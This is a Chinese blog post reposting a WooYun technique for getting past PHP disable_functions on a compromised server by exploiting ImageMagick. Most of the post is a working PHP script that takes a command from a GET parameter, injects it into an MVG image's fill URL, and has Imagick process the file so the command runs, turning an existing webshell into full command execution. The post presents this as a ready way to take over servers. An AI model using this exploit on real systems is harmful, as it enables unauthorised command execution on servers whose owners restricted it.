正在阅读:

利用ImageMagick漏洞绕过disable_function

7,476

最近ImageMagick漏洞比较火,上传一个图片,搞定一台服务器已经不在话下。。。收集一些大牛们YD的思路,供大学学习。。

当你上传了一个webshell,遇到下面的情况如何解决?

disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

根据以前的经验,有的是使用dl扩展来执行命令,不过我从未测试过,现在有了新的姿势,当然也是要有ImageMagick组件了。

<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
    $command = 'id';
}

$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>

imagemagic1

原文地址:http://zone.wooyun.org/content/27038

目前有:1条访客评论

  1. 解决经济
    2017-10-30 17:44

    [/流泪]

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌